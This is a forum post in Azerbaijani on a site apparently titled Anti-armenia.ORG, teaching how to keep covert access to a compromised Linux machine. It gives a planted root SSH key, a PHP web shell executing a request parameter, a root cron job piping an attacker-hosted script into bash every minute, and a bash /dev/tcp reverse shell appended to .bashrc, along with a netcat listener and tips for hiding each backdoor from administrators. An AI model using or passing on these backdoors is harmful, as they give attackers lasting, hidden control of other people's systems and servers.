Anti-armenia.ORG - Forumlar - Linux Backdoors



Istifadəçi
    2022-01-17 18:40 GMT                 

Tron



İstifadəçi
Mesaj Sayı : 20
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Bakı
Ölkə :
Məslək : Pentester
Yaş :
Mesaj :

Mövzunu Paylaş!


Salam uşaqlar, mən sizə bu mövzuda linux backdoorlarını göstərəcəyəm, backdoor nədir? Arxa qapı sistemə davamlı çıxışımızı təmin etmək üçün edə biləcəyimiz bir şeydir.
SSH-Backdoor
Ssh arxa qapısı mahiyyətcə ssh açarlarımızı bəzi istifadəçinin əsas dizinində tərk etməkdən ibarətdir. Adətən istifadəçi root olur, çünki o, ən yüksək yetkilərə malik istifadəçidir.
Bunu etmək üçün sadəcə aşağıda göstərildiyi kimi ssh-keygen əmrini yerinə yetirin
https://imgur.com/JmRkLjw
İndi 2 açarımız var. 1 gizli açar və 1 açıq açar, indi /root/.ssh-ə keçib açıq açarımızı orada qoya bilərik. Açıq açarın adını belə dəyişməyi unutmayın: authorized_keys

.ssh dizini yoxdursa, onu həmişə əmrdən istifadə edərək yarada bilərsiniz: "mkdir .ssh"

Artıq arxa qapımızı tərk etdiyimizə görə sadəcə olaraq root olaraq daxil ola bilərik!

Bunu etməzdən əvvəl chmod 600 id_rsa istifadə edərək şəxsi açara düzgün icazələr verin.

Bu lazımdır, çünki bunu etməsək, ssh icazələrin açarda kifayət qədər təhlükəsiz olmadığından şikayət edəcək və çox güman ki, ondan istifadə etməyimizə icazə verməyəcək.

Açara düzgün icazələri verdikdən sonra istədiyimiz maşına daxil olmaq üçün "ssh -i id_rsa root@ip" edə bilərik

PHP-Backdoor
Əgər siz Linux kampüterdə kök girişi əldə edirsinizsə, çox güman ki, veb kökündə kimlik məlumatları və ya hər hansı faydalı məlumat axtarırsınız.

Veb kök adətən /var/www/html ünvanında yerləşir

İndi bunu bildiyiniz üçün istənilən adda php faylı yaratmağa cəhd edə və bu parçanın içərisinə keçə bilərsiniz:
PHP:
<?php
if (isset($_REQUEST['cmd'])) {
echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
}
?>
Bu kod sadəcə olaraq "cmd" parametrini alır və həmin parametrə verilən hər şeyi yerinə yetirir.
Qeyd edək ki, biz istifadə edirik: "$_REQUEST['cmd'])", bu o deməkdir ki, siz bu parametri GET və ya POST məlumatlarında ötürə bilərsiniz.
İndi bu fayl saxlandığına və hazır olduğuna görə biz onu sorğulamağa cəhd edə bilərik.
Faylı /var/www/html/shell.php | ünvanına endirin Siz http://ip-v4/shell.php vasitəsilə birbaşa daxil ola bilməlisiniz

Bu kod parçasını /var/www/html-dəki mövcud php fayllarına əlavə etməyə çalışın. Faylların ortasına daha çox əlavə etmək bizi daha gizli edəcək.

CronJob-Backdoor
Bu arxa qapı cronjob yaratmaqdan ibarətdir!

/etc/cronjob olan cronjobs faylınıza nəzər salsanız, belə bir şey görəcəksiniz:
https://imgur.com/ywQIFmb
Bu, müəyyən bir zamanda kompüterinizdə yerinə yetirilməsi planlaşdırılan bütün tapşırıqları təmsil edir.

İstənilən hostda kök girişiniz olduqdan sonra hər hansı planlaşdırılmış tapşırıq əlavə edə bilərsiniz. Siz hətta hər dəqiqə sizə tərs qabığın göndərildiyi bir tapşırığı konfiqurasiya edə bilərsiniz. Məhz bunu edəcəyik.

Tapşırıqların üstündəki 2 hərfi qeyd edin: "m və h"

Bunlar tapşırığın saatlıq və ya dəqiqəlik yerinə yetirilməli olduğunu göstərən hərflərdir.

Yuxarıdakı nümunədə "h" hərfinin altında "*" işarəsinin olduğunu görə bilərsiniz. Bu o deməkdir ki, aşağıdakı tapşırıq hər saat yerinə yetiriləcək.

İndi arxa qapımıza gedək!

Bu sətri cronjob faylımıza əlavə edin:

* * * * * root curl http://<seizinipniz>:8080/shell | bash

Diqqət yetirin ki, hər şeyə ulduz işarəsi "*" qoyuruq. Bu bizim üçün lazımdır hər dəqiqə, hər saat, hər gün və s. işləyəcək deməkdir.

Faylı yükləmək üçün əvvəlcə "curl" istifadə edirik və sonra onu "bash"-a idxal edirik.

İstifadə etdiyimiz "qabıq" faylının məzmunu sadədir:

-------------------------------------------------

#!/bin/bash

bash -i >& /dev/tcp/ip/port 0>&1

------------------------------------------------- --------------

Qabığımıza xidmət edən HTTP serverini işə salmalıyıq.

Buna "python3 -m http.server 8080" əmrini işlətməklə nail ola bilərsiniz.

Shellimiz endirildikdən sonra, o, "bash" tərəfindən icra ediləcək və bir qabıq alacağıq!

*Göstərdiyiniz portda "nc -nvlp <port>" ilə qulaq asmağı unutmayın*

~ Arxa qapımızı gizlətməyi unutmayın, çünki hamı cronjoblara baxır

.bashrc-Backdoor

İndi ".bashrc" Backdoor-a daxil olaq!

Əgər istifadəçinin giriş qabığı kimi bash varsa, interaktiv seans başlayanda giriş dizinində ".bashrc" faylı icra olunur.

Beləliklə, əgər siz öz sistemlərinə tez-tez daxil olan hər hansı bir istifadəçini bilirsinizsə, sadəcə olaraq bu əmri yerinə yetirin ki, öz əks qabığını öz ".bashrc"-ə daxil edin.

Bash:
echo 'bash -i >& /dev/tcp/ip/port 0>&1' >> ~/.bashrc

Əhəmiyyətli bir şey, istifadəçinizin nə vaxt daxil olacağını bilməyəcəyiniz üçün netcat dinləyicinizi həmişə hazır vəziyyətdə saxlamaqdır.
Bu hücum çox təhlükəlidir, çünki heç kim ".bashrc" faylını yoxlamağı düşünmür.

Anti-armenia.ORG